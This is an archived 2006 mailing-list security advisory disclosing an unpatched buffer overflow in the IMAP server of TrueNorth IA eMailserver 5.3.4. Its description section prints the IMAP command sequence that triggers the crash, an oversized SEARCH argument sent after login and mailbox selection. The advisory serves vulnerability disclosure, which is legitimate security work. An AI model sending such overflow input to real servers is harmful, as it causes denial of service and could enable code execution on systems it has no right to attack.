|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[AJECT] TrueNorth IA eMailserver 5.3.4 buffer overflow vulnerability
From: Joćo Antunes (jantunes
di.fc.ul.pt)
Date: Mon Feb 20 2006 - 11:47:52 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
----------------------------------------
Synopsis
----------------------------------------
TrueNorth IA eMailserver 5.3.4 is prone to a remote buffer overflow
vulnerability in the IMAP server.
Product: Internet Anywhere eMailserver Corporate Edition
Version: 5.3.4 and probably the older versions
Vendor: TrueNorth/NoticeWare (http://www.tnsoft.com/)
Type: Buffer overflow / Boundary condition error
Risk: Execution of arbitrary code, denial of service
Remote: Yes
Discovered by: Joćo Antunes (AJECT -- Attack Injection Tool) on 10/Dec/2005
Exploit: Not Available
Solution: Not Available
Status: Unpatched. No reply from developer(s).
----------------------------------------
Vulnerability Description
----------------------------------------
The vulnerability can be triggered by sending the following messages to
the imap server:
A001 LOGIN username password // enter in AUTHENTICATED state
A002 SELECT inbox // enter in SELECTED state
A003 SEARCH <A x 560> // overflow search argument
This will crash the server. Successful exploitation could result in a
denial of service or execution of arbitrary code.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]